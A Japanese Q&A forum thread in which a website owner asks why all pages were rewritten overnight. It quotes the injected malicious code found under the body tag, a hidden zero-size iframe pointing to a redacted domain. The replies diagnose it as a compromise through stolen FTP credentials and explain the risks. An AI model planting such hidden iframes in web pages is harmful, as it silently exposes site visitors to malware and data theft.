WEBサイトの全ページが真っ白に。ウイルス?
- 50ページほどのWEBサイトを運営していますが、先日問題が発生しました。
- トップページがぐちゃぐちゃになり、index以下のページはすべて真っ白になりました。
- サーバー側のファイルに不正なコードが混入していたのでしょうか。心配です。
- ベストアンサー
WEBサイトの全ページが真っ白に。ウイルス?
全50ページほどのWEBサイトを運営しています。 サーバーはレンタルサーバーで、FTPソフトを使用してページをアップロードしています。 先日、トップページを開いたところレイアウトがぐちゃぐちゃになっていました。 (カラム落ちしたり、ヘッダーが表示されていなかったり。) そして、index以下のページは全て真っ白、何も表示されていない状態に。 FTPソフトで見ると、サーバー側のファイルの更新時間が、朝の8:42~43に全ページ書き換えられていました。 もちろん何もさわっていません。 ローカルファイルを一括アップロードすると元通りに回復しました。 レンタルサーバー会社のお知らせに、 「メンテナンス時に不具合が生じたようで…」とのコメント。 サーバー側の不具合か?と思っていたのですが、 真っ白になったページのソースを見てみると<body>直下に <!--1679091c5a880faf6fb5e6087eb1b2dc--> <iframe src="www.○○.com/70cc.php?id=codeblockstat" width="0" height="0" style="display:none;" /> <!--/1679091c5a880faf6fb5e6087eb1b2dc--> と入っていました。もちろんこんなタグは入れていません。 急いでアップロードし直したので全ページこれだったかは定かではありませんが おそらく「style="display:none;"」は入っていたものと思われます。 「www.○○.com」にアクセスすると、わけのわからない真っ青な外国のページでした。 (ウイルスか何かだったらいけないと思い、URLは伏せました。) サーバーの不具合でこんなソースが混入するものでしょうか? サイトがサイトでしたので、何か意図的なソースの書き換えだったのではないかと考えています。 そういえば以前も、朝の9:13~15にかけてサーバー側のファイルが全ページ更新されていたことがあったのですが、その時は特に実害がなかった(ように思われた)ので、パスワードもそのままにしたと思います。 「ガンプラ―ウイルス」というものにも感染したことがあるので、心配です。 こういうのはどういう方がどういう目的で発信するんでしょうかねぇ… 何かご存知の方いらっしゃいましたら教えていただけませんでしょうか。 よろしくお願いいたします。
- その他(インターネット・Webサービス)
- 回答数2
- ありがとう数4
- みんなの回答 (2)
- 専門家の回答
質問者が選んだベストアンサー
> <iframe src="www.○○.com/70cc.php?id=codeblockstat" width="0" height="0" style="display:none;" /> こんな「絶対に画面上に表示させない」ことを狙ったiframeの挿入はウイルスか不正アクセス意外には考えにくいと思います。 仮に「サーバー側の不具合」だったとしても障害の類ではなく不正アクセスやウイルス感染の類だと思われます。 サーバー運営者側が現在はまだ調査中で障害の詳細を発表できていない、という可能性は考えられますが、詳細が出ていて内容があくまでメンテナンス関連のものであれば、今回の件との関連は薄いでしょう。 それよりも気になるのは、 > 「www.○○.com」にアクセスすると、わけのわからない真っ青な外国のページでした。 何故、そんな怪しげなサイトにアクセスしちゃいますか? 該当のコードはそのサイトにユーザーをアクセスさせることが目的のコードですので、そこにアクセスした時点で一巻の終わりである可能性が非常に高いです。 アクセスすることでウイルスに感染させるなどというレベルでなく、既にウイルス感染したPCをそこにアクセスさせることで個人情報を根こそぎ引っこ抜いている可能性も十分に考えられます。 状況から、あなたのPC内のデータは全部外部に流出してしまった可能性を考慮しておくべきでしょう。 また、 > 「ガンプラ―ウイルス」というものにも感染したことがある という経緯がありながら > その時は特に実害がなかった(ように思われた)ので、パスワードもそのままにしたと思います。 という辺りも非常にぬるすぎます。 ほとんどダダ漏れじゃないですか。 > こういうのはどういう方がどういう目的で発信するんでしょうかねぇ… ネットショッピングなどで利用するクレジットカードの情報などを奪う、などが主な目的です。 軽度なイタズラレベルでは、写真などの画像を抽出して、プライベートな恥ずかしい画像などがあればそれを本名・住所付きでネット上にばらまいたりする人もいますね。 仮にあなたのPCにはそのような情報がなく特に実害が無かったとしても、今回のようにFTPのパスワードを奪いあなたのサイトの情報を書き換えることで、あなたのサイトを信用して閲覧しに来る全てのユーザーに同様のウイルスを感染させ、そちらで実被害を大量に出します。 つまり、あなたがそういうウイルス対策を放置して適当に済ますことは、あなたの友人・知人に対して個人情報漏洩を幇助していることになるのです。
その他の回答 (1)
- violet430
- ベストアンサー率36% (27472/75001)
レンタルサーバ会社へ確認すべきです。その上で彼らが知らないということなら不正アクセスされた可能性があるということですね。もしそうなら今後はそのサーバを解約した方がいいと思います。
お礼
早速のご回答感謝いたします。 はい、サーバー運営会社に問い合わせしてみることにします。 ありがとうございました。
関連するQ&A
- webサイトのセキュリティついて
現在、業者に任せていたwebサイト更新を自社でやろうと思っています。 サーバーはレンタルでFTPにアップする形ですが、 自社で出来るセキュリティ対策(工夫)というものはあるでしょうか? (html・CGI・Javaソースの記述等で、できる対策などです) 又、ファイル構造は読まれにくい方が良い、 (簡単にファイルを盗まれないため?) CGIでページを作ったほうがいい、 (動的にページが生成するためソースをよまれないからでしょうか?) ということを聞いたことがありますが、 その意味と方法などありましたら どうぞ教えてください。 (CGIでのセキュリティホール、サーバーへの負荷等は承知しております そこあたりの説明は不要です) よろしくお願いいたします。
- 締切済み
- ネットワーク
- サーバにhtmlファイルをアップロードしたい!
現在学校で、サーバ(Windows Server 2008 R2 Standard)へクライアント(XP)から htmlファイルをアップロードし、サーバのIIS7.0にFTPでアップロード及び表示させようと 色々なサイトで調べています。(ちなみにど素人です...) 取り急ぎサーバ側クライアント側にFTPをインストールしました。 ここから、どうクライアントのhtmlファイルをサーバ側へアップロードするのか皆目見当がつき ません。 FTP及びIISの設定や、サーバとクライアントのファイアウォールの解除など、色々な設定が あるかと思います。 アドバイス頂けませんでしょうか? よろしくお願いいたします。
- ベストアンサー
- ハードウェア・サーバー
- MS publisherでWebページをアップロードしたい
初歩的な質問です。 publisher2003でトップページをつくり、「webページの作成」を保存しました。 が、どこを見てもレンタルサーバースペースへのアップロードボタンがありません。考えると、レンタルサーバーの細かい設定もしていませんでしたので設定しようと思ったら、その設定をするボタンもありません。 何か使い方を間違っているのでしょうか? FTPというか、アップロード機能はついていると思うんですが・・・ ちなみに、PCにはそれほど精通しておりません。 以上、よろしくお願いします。
- ベストアンサー
- ホームページ作成ソフト
- 自分のサイトにつながらなくなりました
昨日から突然自分のサイトにつながらなくなりました。 有料のレンタルサーバーです。 出てくるメッセージは「ページを表示できません」「取り消されたアクション」などです。 FTPアップロードソフトで接続すると、ちゃんと接続できて、ホスト側にもファイルは揃っていてダウンロードすることもできます。 管理会社にメールしましたがまだ返事は来ません。 こちら側でなにか問題があるのでしょうか? それとも返事を待つしかないのでしょうか? 詳しい方よろしくお願いします。 ブラウザはIEとsleipnirです。
- ベストアンサー
- その他(インターネット接続・通信)
- webデザイン サイト更新 filezilla
初歩的な質問失礼します。 サーバーにアップロードしたwebサイトを更新したくて、元のhtmlファイルの内容を変更して、先にアップロードしていたディレクトリを削除し、内容の変更されたディレクトリをアップロードしたのですが、ブラウザでチェックしてみると反映されていませんでした。 FTPソフトはfilezillaを使っています。filezillaを使っている方、サイトの更新の仕方を教えて頂けないでしょうか?
- ベストアンサー
- CSS
- サーバーにアップロードされたwebページについて
サーバーにアップロードされたwebページは、そのwebページのファイルを削除(FFFTP上で)してもネット上に残っているものなのでしょうか? また、アップロードするにしてもアップロードされたものを削除するにしても、検索結果に反映されるのには、タイムラグがあるのでしょうか?
- ベストアンサー
- その他([技術者向] コンピューター)
- Q:webページの作成とアップロードについて
環境はwin95だと考えてください。 例えば、indexのページを作るとします。ファイル名はindex.htmでそれを、 c:\webpage\index.htmとして保存します。このindex.htmには画像オブジェクト が貼り付けられていて、それが例えば、c:\webpage\gif001.gifだとします。 で、c:\webpage\index.htmをアップロードすると、通常は、ftpサーバ経由でwww サーバに転送されると思うのですが、index.htm内のgif001.gifへのリンクは htmlでc:\webpage\gif001.gifのままのはずです。このファイルはwwwサーバ に送られたらリンクがきれちまう(サーバ内のc:\webpage\なんて指定できない と思うので・・)と思うのですが、一般的にはどうやってサーバにアップロードしているのでしょうか? 相対的に(?)リンク先を指定できる記述でもしているのでしょうか?
- 締切済み
- その他(インターネット・Webサービス)
- TOPページしか出てこないです
はじめまして。 市販のホームページ作成ソフト「WebDesignWORKS7」ver.7.0.0.4を使用しています。 これで作成したファイルをサーバ側の指定するフォルダに転送する所までは出来たのですが、 ブラウザでアクセスするとTOPページしか表示されません。 他ページへのリンクを貼ったボタン等をクリックすると 「ページが見つかりません」となります。 FTPソフトでサーバ側フォルダを覗いてみると、ファイルは存在しています。 作成したホームページはテキストと画像を貼っただけのものです。 自分のPC内でのプレビューにおいては、問題なくリンクを貼った各ページが表示されるのですが。 サーバはniftyで、公開設定は「公開中」です。 サーバ側の指定フォルダを空にして、再転送をしてみましたが変わらず。 別のFTPソフトを使用しても変わらず。 どのように解決していけばよいでしょうか? 教えてください。 m(_ _)m
- ベストアンサー
- ホームページ作成ソフト
- Webサイトのリニューアル手順について
HTMLとCSSで作成された既存サイトをリニューアルした時のファイルをアップする手順について教えて欲しいです。 ドメインもサーバーもそのままなので、FTPツールであげるだけだと思いますが、既存HPは他人に作成してもらっているのでcssフォルダは今回とは違うファイルもあります。 サーバーにアップするとindex.htmlは上書き、cssの同じファイル名は上書き、必要ないものはそのまま残ってたり、新しく追加されてるファイルなど混ざるの思います。 そこで疑問なのですが、新しいファイルを全てアップロードして古い必要ないものは削除するという手順であっていますか?それとも他に効率のいいやり方がありますでしょうか? よろしくお願いいたします。
- 締切済み
- HTML
- 携帯サイトのcssについて
携帯サイトを作っております。 私の機種はdocomoの903なのですが以下のソースでページをみると リストスタイルが表示されてしまいます。 <ul style="list-style-type: none;"> <li>1</li> <li>2</li> <li>3</li> </ul> ※list-style: none;で試しても結果は同様でした。 <div style="..."></div> のように設定している他の箇所は大丈夫なのでcssの反映には 問題ないと思うのですがどうすればいいでしょうか?
- ベストアンサー
- HTML
お礼
ご回答ありがとうございます。 やはり、ウイルスの可能性大ですか… 考えが甘かったですね。ご指摘感謝いたします。 「www.○○.com」へは、興味本位と言いますか ウイルスなどではないかもしれないという期待もあって アクセスしてしまいました。 ということは? サーバー運営会社の問題ではなく、当方のFTPソフトのセキュリティ対策が甘くパスワードを奪われてしまったために、今回の件が起きたというのが有力説でしょうかねぇ… サーバー運営会社にも問い合わせしてみたいと思います。 こちらでもFTPソフトのパスワードをまめに変えるなどして対策をしていきます。 ありがとうございました。